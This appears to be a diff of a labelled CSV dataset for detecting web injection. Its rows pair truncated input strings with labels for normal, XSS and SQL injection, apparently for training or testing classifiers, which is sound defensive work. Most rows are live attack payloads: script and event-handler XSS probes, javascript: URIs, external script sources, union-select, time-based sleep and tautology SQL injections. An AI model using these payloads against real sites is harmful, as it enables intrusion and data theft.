onpaste=""alert(1)"" contenteditable>test</spa",1,XSS,6908 +"select * from users where id = 1 union select 1a,b",2,SQLi,11930 +"1%"" rlike ( select * from ( select ( sleep ( 5 ) )",2,SQLi,14075 +[a](javascript://www.google.com%0Aprompt(1)),1,XSS,9432 +<svg><option onload=alert(1)></option>,1,XSS,2153 +"-7236 or make_set ( 9618 = 6919,6919 )",2,SQLi,20222 +"{""id"":null,""name"":""Immortal Jellyfish""}",0,normal,27202 +Insert a memory.,0,normal,22803 +You can search the site easily to find just what y,0,normal,25088 +1' and 3707 = ( select count ( * ) from sysibm.sys,2,SQLi,13286 +"<center onmouseleave=""alert(1)"">test</center>",1,XSS,5007 +Modify settings.,0,normal,23013 +-2790' ) ) or 8571 = 8571--,2,SQLi,15999 +"<;SCRIPT SRC="";http://ha.ckers.org/xss.jpg"";>;<;/S",1,XSS,1629 +"-8838"" ) ) as xisn where 2749 = 2749 or 3440 = cas",2,SQLi,19843 +<script>top['alert'](3)</script>,1,XSS,9717 +1 ) as lejp where 5238 = 5238 union all select nul,2,SQLi,21318 "<script\x0Atype=""text/javascript"">javascript:alert",1,XSS,359 <script>var{a:onerror}={a:alert};throw 1</script>,1,XSS,139 -<style>:target {transform: rotate(180deg);}</style,1,XSS,8492 -1 and 6414 = ( select count ( * ) from rdb$fields ,2,SQLi,16767 -1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SL,2,SQLi,11182 +<tbody onfocusout=alert(1) tabindex=1 id=x></tbody,1,XSS,8494 +-2527 ) ) as oqpy where 7468 = 7468 or 3038 = 3038,2,SQLi,16769 +)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (,2,SQLi,11184 ";a=prompt,a()//",1,XSS,341 -"<style>@keyframes x{}</style><spacer style=""animat",1,XSS,4858 -"select pg_sleep ( 5 ) and ""ilyw"" like ""ilyw",2,SQLi,17824 -"<a href=""javascript%26colon;alert(1)"">click",1,XSS,9570 -"1' or 8384 = like ( 'abcdefg',upper ( hex ( random",2,SQLi,13866 -1' ) ) and 3707 = ( select count ( * ) from sysibm,2,SQLi,17331 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10583 -<figure onpointerenter=alert(1)>XSS</figure>,1,XSS,5499 -"iif ( 1217 = 8831,1,1/0 )",2,SQLi,21301 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8557 -",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfo",2,SQLi,10914 -"<li onmousedown=""alert(1)"">test</li>",1,XSS,1933 -"<label onbeforecopy=""alert(1)"" contenteditable>tes",1,XSS,2353 -( select ( case when ( 9525 = 9280 ) then 9525 els,2,SQLi,15849 -"<sup draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,3237 -1 ) and ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,12356 -"javascript:""/*\""/*`/*' /*</template></textarea></n",1,XSS,9494 -We are developing a new method of screening potent,0,normal,25177 -"<style>@keyframes slidein {}</style><head style=""a",1,XSS,3808 -"<thead draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,1937 -<style>:target {color:red;}</style><rtc id=x style,1,XSS,5620 -"1"" ) or 4411 = ( select count ( * ) from sysusers ",2,SQLi,14974 -"1%"" ) ) ) or char ( 119 ) ||char ( 100 ) ||char ( ",2,SQLi,20539 -"1 ) where 5261 = 5261 and elt ( 1210 = 1210,sleep ",2,SQLi,18801 -Select the perfect accessory for the look.,0,normal,24241 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6140 +"<button oncopy=""alert(1)"" contenteditable>test</bu",1,XSS,4860 +"-6453"" ) ) as hehs where 9363 = 9363 union all sel",2,SQLi,17826 +<embed src=//14.rs>,1,XSS,9572 +"1"" ) ) ) union all select null,null,null,null,null",2,SQLi,13868 +1' ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ),2,SQLi,17333 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10585 +"<rp onkeyup=""alert(1)"" contenteditable>test</rp>",1,XSS,5501 +"1"" and 6969 = ( select 6969 from pg_sleep ( 5 ) ) ",2,SQLi,21303 +"<rp onmousedown=""alert(1)"">test</rp>",1,XSS,8559 +""",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitf",2,SQLi,10916 +<menu id=x tabindex=1 ondeactivate=alert(1)></menu,1,XSS,1934 +<mark onpointerup=alert(1)>XSS</mark>,1,XSS,2354 +"-2962' ) ) ) or 1570 = convert ( int, ( select cha",2,SQLi,15851 +<u id=x tabindex=1 onfocus=alert(1)></u>,1,XSS,3239 +"1"" ) ) as rcse where 4559 = 4559 and extractvalue ",2,SQLi,12358 +"javascript:`/*\""/*--><svg onload='/*</template></n",1,XSS,9496 +We have to listen to the people who select it.,0,normal,25174 +<colgroup id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,3810 +"<source draggable=""true"" ondragend=""alert(1)"">test",1,XSS,1938 +<style>:target {color: red;}</style><dd id=x style,1,XSS,5622 +1 ) ) as fynx where 9636 = 9636 union all select n,2,SQLi,14976 +1 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6,2,SQLi,20541 +"-4915' union all select 1928,1928,1928,1928#",2,SQLi,18803 +Select a hairstyle for a makeover.,0,normal,24238 +<style>:target {color: red;}</style><i id=x style=,1,XSS,6142 <embed src=%(jscript)s></embed>,1,XSS,786 -transaction,0,normal,23174 -"<area oncut=""alert(1)"" contenteditable>test</area>",1,XSS,8037 -"<div draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,8316 -"{""id"":null,""firstName"":""Khairuddin"",""lastName"":""Ad",0,normal,26887 -1%' ) ) ) rlike ( select * from ( select ( sleep (,2,SQLi,22053 -"-2287' ) ) union all select 1200,1200,1200,1200,12",2,SQLi,18557 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2170 -Modify settings.,0,normal,23013 -"1 ) ) and make_set ( 8403 = 8403,8899 ) and ( ( 46",2,SQLi,20394 -"1 ) ) and elt ( 4249 = 4249,7259 ) and ( ( 5683 = ",2,SQLi,20725 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,17295 -Where's the missing piece of jewelry?,0,normal,22653 -"1%"" ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) |",2,SQLi,14139 -"1 ) ) ) union all select null,null,null,null,null,",2,SQLi,18694 -"select * from users where id = 1. union select 1,v",2,SQLi,11827 -"end and ( ( ( ""%"" = """,2,SQLi,16347 -<kbd onpointerleave=alert(1)>XSS</kbd>,1,XSS,6592 -<mark onpointerdown=alert(1)>XSS</mark>,1,XSS,4459 -1'|| ( select 'fjlg' from dual where 9517 = 9517,2,SQLi,14326 -"<dt onbeforecut=""alert(1)"" contenteditable>test</d",1,XSS,7598 -"`-alert(1)"">'onload=""`<svg/1='",1,XSS,9371 -"<iframe onmouseover=""alert(1)"">test</iframe>",1,XSS,4653 -Join the book club.,0,normal,22603 +foreign,0,normal,23176 +"<h1 onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,8039 +<svg><center onload=alert(1)></center>,1,XSS,8318 +"{""id"":null,""firstName"":""Manie"",""lastName"":""Villar""",0,normal,26884 +"1"" ) ) as vhrq where 1690 = 1690 and elt ( 1210 = ",2,SQLi,22055 +select ( case when ( 6002 = 9048 ) then 6002 else ,2,SQLi,18559 +"<marquee draggable=""true"" ondrag=""alert(1)"">test</",1,XSS,2171 +Filter emails.,0,normal,23015 +select ( case when ( 9490 = 6134 ) then 9490 else ,2,SQLi,20396 +"1"" ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( ",2,SQLi,20727 +-4339 ) where 7178 = 7178 or 4008 = 7232,2,SQLi,17297 +Insert the memory stick.,0,normal,22655 +1' ) ) and 8312 = dbms_pipe.receive_message ( chr ,2,SQLi,14141 +1' rlike sleep ( 5 ) #,2,SQLi,18696 +select * from users where id = 1 union select @<@.,2,SQLi,11829 +"1%"" ( select ( case when ( 4587 = 4587 ) then rege",2,SQLi,16349 +<p onpointerover=alert(1)>XSS</p>,1,XSS,6594 +<style>:target {color:red;}</style><noembed id=x s,1,XSS,4461 +"-3879' union all select 9814,9814,9814,9814,9814,9",2,SQLi,14328 +<svg><thead onload=alert(1)></thead>,1,XSS,7600 +alert&#x28;1&#x29,1,XSS,9373 +<output onpointerover=alert(1)>XSS</output>,1,XSS,4655 +Sort the jumbled cables.,0,normal,22605 <script>/* *\x2A/javascript:alert(1)// */</script>,1,XSS,443 -1'|| ( select 'dukt' where 3206 = 3206 or 4411 = (,2,SQLi,19800 -<button onChange=javascript:alert(1)>,1,XSS,9592 -Mr. Trump has yet to select nominees for the vacan,0,normal,25874 -Select a style for the haircut.,0,normal,24256 -<button onReadyStateChange=javascript:alert(1)>,1,XSS,9650 -Select dish.,0,normal,24534 -"<textarea onmousedown=""alert(1)"">test</textarea>",1,XSS,5745 -"1"" ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( 1",2,SQLi,15748 -"-2849' union all select 6491,6491,6491,6491,6491,6",2,SQLi,17439 -"1"" or row ( 1045,7562 ) > ( select count ( * ) ,co",2,SQLi,15846 -"1' ) union all select null,null,null#",2,SQLi,20084 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11952 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,19802 +<button onContextMenu=javascript:alert(1)>,1,XSS,9594 +Next we need to select a suitable full wave bridge,0,normal,25871 +Select a painting style for expression.,0,normal,24253 +<button onRepeat=javascript:alert(1)>,1,XSS,9652 +Select napkin.,0,normal,24531 +<ul onblur=alert(1) tabindex=1 id=x></ul><input au,1,XSS,5747 +"select pg_sleep ( 5 ) and ""zhsc"" = ""zhsc",2,SQLi,15750 +"1%"" ) ) ) rlike sleep ( 5 ) and ( ( ( ""%"" = """,2,SQLi,17441 +1' ) ) as umah where 3781 = 3781 union all select ,2,SQLi,15848 +1 ) ) ) or 4915 = ( select count ( * ) from domain,2,SQLi,20086 +"admin"" ) or ""1"" = ""1""#",2,SQLi,11954 "<iframe style=""xg-p:absolute;top:0;left:0;width:10",1,XSS,930 -""" Scroll down to ""importance markers"" and select """,0,normal,26472 -Select the photos.,0,normal,22853 -<div id=x tabindex=1 onbeforeactivate=alert(1)></d,1,XSS,8768 -select case when 6662 = 9889 then 1 else null end-,2,SQLi,18214 -select name from syscolumns where id = (select id ,2,SQLi,11121 --9087 or 3038 = 3038,2,SQLi,14731 -1' and 1 = ( select count ( * ) from tablenames ) ,2,SQLi,11739 -"1"" or 8421 = ( select count ( * ) from generate_se",2,SQLi,13791 -Amazon is offering up to 1033% off select Twitch C,0,normal,26379 -"1 ) ) or 8384 = like ( 'abcdefg',upper ( hex ( ran",2,SQLi,21931 +""" Then, under ""Rewards points,"" select ""American E",0,normal,26469 +Sort the files.,0,normal,22855 +"<tr onbeforecut=""alert(1)"" contenteditable>test</t",1,XSS,8770 +select ( case when ( 6045 = 2786 ) then 6045 else ,2,SQLi,18216 +"union select * from users where login = char(114,1",2,SQLi,11123 +end and 'huti' like 'huti,2,SQLi,14733 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11741 +-6423' ) or 6872 = 6872,2,SQLi,13793 +"Amazon Prime members, however, will be able to get",0,normal,26376 +1' ) as yqld where 2489 = 2489,2,SQLi,21933 +Select your consider.,0,normal,24975 +<rt onpointerout=alert(1)>XSS</rt>,1,XSS,2013 +"1"" ) as cysq where 5258 = 5258",2,SQLi,17300 +"<head onmouseout=""alert(1)"">test</head>",1,XSS,7614 +"1"" ) ) order by 1#",2,SQLi,19660 +1 ) ) as wrhe where 6120 = 6120 and 6240 = ( 'qqpj,2,SQLi,16031 +Randomly select a game.,0,normal,24317 +"{""id"":null,""name"":""sat knew""}",0,normal,27326 +1'+ ( select 'vkis' where 3712 = 3712 ( select ( c,2,SQLi,18993 +"end and ( ( ""cxoi"" = ""cxoi",2,SQLi,21315 +"<picture onpaste=""alert(1)"" contenteditable>test</",1,XSS,6567 Select your visualize.,0,normal,24978 -<option onpointerout=alert(1)>XSS</option>,1,XSS,2012 -"1"" ) ) as irrz where 8730 = 8730 order by 1#",2,SQLi,17298 -"<label onmouseover=""alert(1)"">test</label>",1,XSS,7612 -"1"" ) as vzdq where 3160 = 3160",2,SQLi,19658 -1'+ ( select cxvy where 7421 = 7421,2,SQLi,16029 -Select the best project.,0,normal,24320 -"{""id"":null,""name"":""stove flag""}",0,normal,27327 -1' ) ) rlike ( select * from ( select ( sleep ( 5 ,2,SQLi,18991 -"-6198"" ) or make_set ( 3602 = 2178,2178 ) and ( ""x",2,SQLi,21313 -<header onpointerleave=alert(1)>XSS</header>,1,XSS,6565 -Select your notice.,0,normal,24981 -1 ) where 5096 = 5096 and 8635 = ( select count ( ,2,SQLi,16391 -1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- ,2,SQLi,11173 -"<style>@keyframes x{}</style><footer style=""animat",1,XSS,7836 -Delete the expired coupons from your wallet.,0,normal,22968 -<input4 onpointerenter=alert(1)>XSS</input4>,1,XSS,3362 -"-8025"" ) or ( 1436 = 4186 ) *4186 and ( ""sqwv"" lik",2,SQLi,12967 -or 1 --',2,SQLi,10136 -"{""id"":null,""name"":""mother wise""}",0,normal,26745 -"1 and make_set ( 8403 = 8403,8899 ) -- rbxf",2,SQLi,18020 -<img src=asdf onerror=alert(document.cookie)>,1,XSS,1142 -"Select ""My apps & games"" from the menu, then selec",0,normal,25676 -On returning to South Africa after the Raid inquir,0,normal,25845 -"1%"" ) ) ) or 7417 = ( select count ( * ) from sysi",2,SQLi,15008 --3166'|| ( select 'mtan' from dual where 9420 = 94,2,SQLi,15435 -"1"" and row ( 6237,7469 ) > ( select count ( * ) ,c",2,SQLi,16744 -"1"" and 2006 = 2006",2,SQLi,18455 -<noembed onpointerleave=alert(1)>XSS</noembed>,1,XSS,3135 -"-9613"" ) ) ) or elt ( 3125 = 7084,7084 ) and ( ( (",2,SQLi,21545 -"<strike draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,6991 -"1"" where 4445 = 4445 procedure analyse ( extractva",2,SQLi,19628 -"We need to reflect, select, revise, and edit, whil",0,normal,25172 -"1' ) and 3202 = like ( 'abcdefg',upper ( hex ( ran",2,SQLi,18627 -1 where 6119 = 6119 or 2367 = ( select count ( * ),2,SQLi,17859 -"<h1 draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,1824 -hi') or ('a'='a,2,SQLi,10082 -"<keygen onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,3260 -HAVING 1=0#,2,SQLi,10214 -"<multicol onmouseout=""alert(1)"">test</multicol>",1,XSS,4021 -"In making such comparisons, it is always desirable",0,normal,26007 -"<select draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,3501 -"<figure onmouseenter=""alert(1)"">test</figure>",1,XSS,2659 -Filter the search results for relevant information,0,normal,22948 -"-9987 ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( ",2,SQLi,17515 -"-2570"" or 1570 = convert ( int, ( select char ( 11",2,SQLi,13750 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10517 -"<time onclick=""alert(1)"">test</time>",1,XSS,1820 -"<aside oncopy=""alert(1)"" contenteditable>test</asi",1,XSS,7462 -"<tr onmouseleave=""alert(1)"">test</tr>",1,XSS,5625 -1' and 3715 in ( ( char ( 113 ) +char ( 113 ) +cha,2,SQLi,17816 -Select your lose.,0,normal,25016 -<video id=x controls onfocusin=alert(1)><source sr,1,XSS,7065 -1 ) and 8407 = ( select count ( * ) from generate_,2,SQLi,20703 -<x o%6Exxx=1,1,XSS,9343 -"1%"" ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ",2,SQLi,12337 -"<button onclick=""alert(1)"">test</button>",1,XSS,4670 -[a](Javas%26%2399;ript:alert(1&#41;),1,XSS,9429 -"<svg onmouseleave=""alert(1)"">test</svg>",1,XSS,5477 +"1"" where 4183 = 4183 union all select null,null,nu",2,SQLi,16393 +) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AN,2,SQLi,11175 +<svg><colgroup onload=alert(1)></colgroup>,1,XSS,7838 +Filter the spam folder for unwanted emails.,0,normal,22970 +<svg/onload=alert('')>,1,XSS,3364 +1' where 9602 = 9602,2,SQLi,12969 +declare @s varchar (8000) select @s = 0x73656c ...,2,SQLi,10138 +1,0,normal,26742 +1%' ) union all select null--,2,SQLi,18022 +<BODY ONLOAD=alert(’XSS’)>,1,XSS,1143 +"Select ""Profile,"" which has a picture of your acco",0,normal,25673 +"On the iPhone 214 order page, select the model you",0,normal,25842 +"1"" ) or 7417 = ( select count ( * ) from sysibm.sy",2,SQLi,15010 +1 where 4787 = 4787,2,SQLi,15437 +-7511 ) ) as xqzf where 9939 = 9939 union all sele,2,SQLi,16746 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,18457 +"<select onmouseenter=""alert(1)"">test</select>",1,XSS,3137 +1'+ ( select sged where 1181 = 1181 or 7552 = ( se,2,SQLi,21547 +"<b onbeforecopy=""alert(1)"" contenteditable>test</b",1,XSS,6993 +"-8894%"" ) ) or 4493 = utl_inaddr.get_host_address ",2,SQLi,19630 +Weekends: Streaming for select public libraries an,0,normal,25169 +-3422%' ) or 5903 = ( 'qqpjq'|| ( select case 5903,2,SQLi,18629 +1' and 6969 = ( select 6969 from pg_sleep ( 5 ) ) ,2,SQLi,17861 +"<div onkeyup=""alert(1)"" contenteditable>test</div>",1,XSS,1825 +));waitfor delay '0:0:__TIME__'--,2,SQLi,10084 +<del id=x tabindex=1 onfocus=alert(1)></del>,1,XSS,3262 +AND 1=0,2,SQLi,10216 +"<main onkeydown=""alert(1)"" contenteditable>test</m",1,XSS,4023 +In order to select remedies which should fulfil th,0,normal,26004 +<samp id=x tabindex=1 ondeactivate=alert(1)></samp,1,XSS,3503 +<var onpointerenter=alert(1)>XSS</var>,1,XSS,2660 +He decided to order a classic burger.,0,normal,22950 +"1' union all select null,null,null,null,null,null,",2,SQLi,17517 +-6218' ) ) or 2236 = 4469#,2,SQLi,13752 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10519 +"<canvas onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,1821 +"<big draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,7464 +"<link onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,5627 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,17818 +Select your beat.,0,normal,25013 +"<output onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,7067 +"-9507%"" union all select 3342,3342,3342,3342,3342#",2,SQLi,20705 +<x onclick=alert(1)>click this!,1,XSS,9345 +"-1184"" ) ) ) union all select 1482--",2,SQLi,12339 +<ins id=x tabindex=1 onbeforeactivate=alert(1)></i,1,XSS,4672 +[a](javascript:confirm(1),1,XSS,9431 +"<rtc onmouseover=""alert(1)"">test</rtc>",1,XSS,5479 "{""id"":null,""firstName"":""Karen"",""lastName"":""Lim"",""a",0,normal,27394 -"1 ) where 9645 = 9645 union all select null,null,n",2,SQLi,15671 -"<style>@keyframes x{}</style><body style=""animatio",1,XSS,1857 -<label id=x tabindex=1 onfocus=alert(1)></label>,1,XSS,2283 -Or select a Medicare Advantage plan that includes ,0,normal,25804 -1' in boolean mode ) and ( 3020 = 3020 ) *6703#,2,SQLi,20393 -1%' and 3715 in ( ( char ( 113 ) +char ( 113 ) +ch,2,SQLi,13393 -Select a gift.,0,normal,22786 -<style>:target {color: red;}</style><dialog id=x s,1,XSS,6440 -<style>:target {color: red;}</style><wbr id=x styl,1,XSS,6032 +1' ) ) ) or 8421 = ( select count ( * ) from gener,2,SQLi,15673 +<strike onpointerover=alert(1)>XSS</strike>,1,XSS,1858 +"<p onkeydown=""alert(1)"" contenteditable>test</p>",1,XSS,2284 +Otherhood arrives on Netflix and in select theater,0,normal,25801 +1 where 9361 = 9361 and 7478 = 9170--,2,SQLi,20395 +"-9352"" ) ) ) or 3038 = 3038",2,SQLi,13395 +Filter spam emails.,0,normal,22788 +"<footer onmousemove=""alert(1)"">test</footer>",1,XSS,6442 +"<spacer ondblclick=""alert(1)"">test</spacer>",1,XSS,6034 <iframe onReadyStateChange iframe onReadyStateChan,1,XSS,387 -"<;SCRIPT SRC="";http://ha.ckers.org/xss.jpg"";>;<;/S",1,XSS,1629 -select * from users where id = 1 or \.< = 1 union ,2,SQLi,11778 -Select Comfort — Select Comfort came in 11 cents a,0,normal,25639 -1,0,normal,26700 -"1' and row ( 6237,7469 ) > ( select count ( * ) ,c",2,SQLi,13852 -"<s draggable=""true"" ondragstart=""alert(1)"">test</s",1,XSS,7719 -"<abbr onmouseover=""alert(1)"">test</abbr>",1,XSS,7545 -? or 1 = 1 --,2,SQLi,11382 -"<marquee onkeydown=""alert(1)"" contenteditable>test",1,XSS,4659 --8007' ) ) as bgpp where 9555 = 9555 or 4144 = ( s,2,SQLi,12498 -"<div id=""113""><div id=""x"">XXX</div>",1,XSS,9102 -%20or%201=1,2,SQLi,10059 -"<table onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,1843 -1' ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||,2,SQLi,18882 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,16586 -Guys seriously start realizing league of legends i,0,normal,26495 -<header onblur=alert(1) tabindex=1 id=x></header><,1,XSS,3869 -<q id=x tabindex=1 onbeforeactivate=alert(1)></q>,1,XSS,5055 -"<basefont onmouseout=""alert(1)"">test</basefont>",1,XSS,5890 -"end and ( ""%"" = """,2,SQLi,14377 -1' ) ) ) and 7401 = 9838#,2,SQLi,19087 -Care should be taken in planting to select a spot ,0,normal,26292 -1 ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 11,2,SQLi,16716 -<ruby onpointerleave=alert(1)>XSS</ruby>,1,XSS,3809 -Select your achieve.,0,normal,25007 +"<;!--#exec cmd="";/bin/echo ';<;SCRIPT SRC';"";-->;<",1,XSS,1630 +select * from users where id = 1. union select ver,2,SQLi,11780 +select Comfort had done it in beds.,0,normal,25636 +1,0,normal,26697 +1' ) or 7552 = ( select count ( * ) from rdb$field,2,SQLi,13854 +"<style>@keyframes slidein {}</style><map style=""an",1,XSS,7721 +<td onpointerleave=alert(1)>XSS</td>,1,XSS,7547 +admin' or 1 = 1#,2,SQLi,11384 +<option onpointerdown=alert(1)>XSS</option>,1,XSS,4661 +"-5910%' ) ) ) union all select 5184,5184,5184,5184",2,SQLi,12500 +"<div id=""115""><!--[if]><script>alert(115)</script ",1,XSS,9104 +"benchmark(10000000,MD5(1))#",2,SQLi,10061 +"<hr draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,1844 +"1"" and 3824 = benchmark ( 5000000,md5 ( 0x76555642",2,SQLi,18884 +1 ) ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ),2,SQLi,16588 +Select your date.,0,normal,24816 +<abbr onfocusout=alert(1) tabindex=1 id=x></abbr><,1,XSS,3871 +"<button draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,5057 +"<ins onmousedown=""alert(1)"">test</ins>",1,XSS,5892 +1 and ( select * from ( select ( sleep ( 5 ) ) ) f,2,SQLi,14379 +"end and ( ( ""kvts"" like ""kvts",2,SQLi,19089 +Children over ten years of age may select the pare,0,normal,26289 +1' ) ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ,2,SQLi,16718 +<style>:target {transform: rotate(180deg);}</style,1,XSS,3811 +Select your finish.,0,normal,25004 <IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>,1,XSS,936 -"UNION ALL SELECT USER(),SLEEP(5)--",2,SQLi,10652 -"<s onmousedown=""alert(1)"">test</s>",1,XSS,1775 -Select restart.,0,normal,24590 -"<s onpaste=""alert(1)"" contenteditable>test</s>",1,XSS,3745 -"1 union all select null,null,null,null,null,null,n",2,SQLi,17374 -"<html oncopy=""alert(1)"" contenteditable>test</html",1,XSS,5444 -"To obtain a good tree, the practice in Kent is to ",0,normal,25264 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,13970 -Where's your SQL knowledge?,0,normal,23378 -"<base onmouseover=""alert(1)"">test</base>",1,XSS,1876 -"1%"" rlike ( select ( case when ( 5135 = 9839 ) the",2,SQLi,22191 -<html onblur=alert(1) tabindex=1 id=x></html><inpu,1,XSS,3761 -"Open the left navigation panel, select Settings, t",0,normal,25811 -Filter the irrelevant data from the report.,0,normal,22959 -<image3 onpointerover=alert(1)>XSS</image3>,1,XSS,3053 -"1%"" ) ) and ( 7817 = 4371 ) *4371 and ( ( ""%"" = """,2,SQLi,20126 -1 ) where 6494 = 6494,2,SQLi,13655 -1'+ ( select 'gqsk' where 3087 = 3087 union all se,2,SQLi,13147 -"On this page, you'll see all of your current conta",0,normal,25835 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4616 --7207' or 4747 = dbms_utility.sqlid_to_sqlhash ( (,2,SQLi,15813 -"<style>@keyframes slidein {}</style><dfn style=""an",1,XSS,3322 -You can choose the color of the paper and/or envel,0,normal,25096 -Sort the alphabet blocks.,0,normal,22631 -1' ) as chla where 6098 = 6098,2,SQLi,22433 -"<nobr draggable=""true"" ondrag=""alert(1)"">test</nob",1,XSS,3312 -Select ideal location.,0,normal,24445 -Select the best course.,0,normal,24344 -Select enter.,0,normal,24581 -"{""id"":null,""firstName"":"""",""lastName"":"""",""address"":",0,normal,26778 -"-5700 where 4238 = 4238 union all select 4238,4238",2,SQLi,12744 -waitfor delay '0:0:5' and ( ( 'nvqf' = 'nvqf,2,SQLi,12872 -"select * from users where id = 1 or ""%_"" or 1 = 1 ",2,SQLi,11596 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8211 -""" or 0 = 0 --",2,SQLi,11432 -1'|| ( select 'ycya' from dual where 3536 = 3536 a,2,SQLi,20013 -"1"" ) where 9680 = 9680 and ( select 2* ( if ( ( se",2,SQLi,20014 --8292%' ) or 8571 = 8571--,2,SQLi,17741 -1' in boolean mode ) or char ( 117 ) ||char ( 111 ,2,SQLi,21387 --9024 ) where 1686 = 1686 or 3069 = 8213--,2,SQLi,16019 -"<XML ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:d",1,XSS,1518 -Chu would select the next clue.,0,normal,26284 --9487 ) ) as rvck where 9404 = 9404 or make_set ( ,2,SQLi,22208 -<noembed id=x tabindex=1 onactivate=alert(1)></noe,1,XSS,4493 -"1"" ) ) as vhrq where 1690 = 1690 and elt ( 1210 = ",2,SQLi,22055 -"<frameset onmouseup=""alert(1)"">test</frameset>",1,XSS,3113 -"1' ) ) and 4241 = convert ( int, ( select char ( 1",2,SQLi,16567 -1'+ ( select zpns where 6922 = 6922 and ( select 9,2,SQLi,16295 -select * from users where id = 1 or \+<\ union sel,2,SQLi,11835 -<aside id=x tabindex=1 onfocusin=alert(1)></aside>,1,XSS,2867 -</style &#32;><script &#32; :-(>/**/alert(document,1,XSS,856 -"The MSB Select DAC II costs just shy of $90,000 (b",0,normal,25407 -<keygen onpointerleave=alert(1)>XSS</keygen>,1,XSS,4913 -"1"" ) ) and ( select 2* ( if ( ( select * from ( se",2,SQLi,13861 -"<param ondblclick=""alert(1)"">test</param>",1,XSS,5464 -1' ) ) ) or 5286 = ( select count ( * ) from all_u,2,SQLi,18185 -Delete the irrelevant data.,0,normal,22761 -<shadow id=x tabindex=1 onfocus=alert(1)></shadow>,1,XSS,5483 -"1 ) ) ) union all select null,null,null,null,null,",2,SQLi,12606 -"To pick photos, you can use either Get Latest Phot",0,normal,25262 -"-5196"" ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, (",2,SQLi,18353 -<main onpointerover=alert(1)>XSS</main>,1,XSS,3829 -Select your examine.,0,normal,24990 -<tfoot onpointerover=alert(1)>XSS</tfoot>,1,XSS,4698 -1%' ) ) ) and ( select 2* ( if ( ( select * from (,2,SQLi,15201 -"<caption draggable=""true"" ondragleave=""alert(1)"">t",1,XSS,4988 -<style>:target {transform: rotate(180deg);}</style,1,XSS,4651 -"1"" or ( select 2* ( if ( ( select * from ( select ",2,SQLi,17544 -Select the perfect wedding ceremony location.,0,normal,24381 -"1"" where 2512 = 2512 or 7417 = ( select count ( * ",2,SQLi,17710 -ORDER BY 16#,2,SQLi,10289 -1 ) and sleep ( 5 ),2,SQLi,21478 -"-6924' ) union all select 2046,2046,2046,2046,2046",2,SQLi,21181 -<body onmessage=alert(1)>,1,XSS,6797 -"<a onkeypress=""alert(1)"" contenteditable>test</a>",1,XSS,5809 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10654 +"<address onkeypress=""alert(1)"" contenteditable>tes",1,XSS,1776 +Select continue.,0,normal,24587 +<br id=x tabindex=1 onactivate=alert(1)></br>,1,XSS,3747 +1' in boolean mode ) or exp ( ~ ( select * from ( ,2,SQLi,17376 +<embed onpointerout=alert(1)>XSS</embed>,1,XSS,5446 +"To publish your own plan, the very first time you ",0,normal,25261 +-9363%' or ( 8459 = 8459 ) *4906 and '%' = ',2,SQLi,13972 +Where's the primary key?,0,normal,23380 +"<style>@keyframes x{}</style><plaintext style=""ani",1,XSS,1877 +1' in boolean mode ) and 6537 = dbms_pipe.receive_,2,SQLi,22193 +"<datalist onbeforepaste=""alert(1)"" contenteditable",1,XSS,3763 +Opposition on petition could be heard before a sel,0,normal,25808 +Plant some vibrant flowers in your garden.,0,normal,22961 +"<slot onmouseout=""alert(1)"">test</slot>",1,XSS,3054 +1 ) ) as eveb where 7567 = 7567,2,SQLi,20128 +1'+ ( 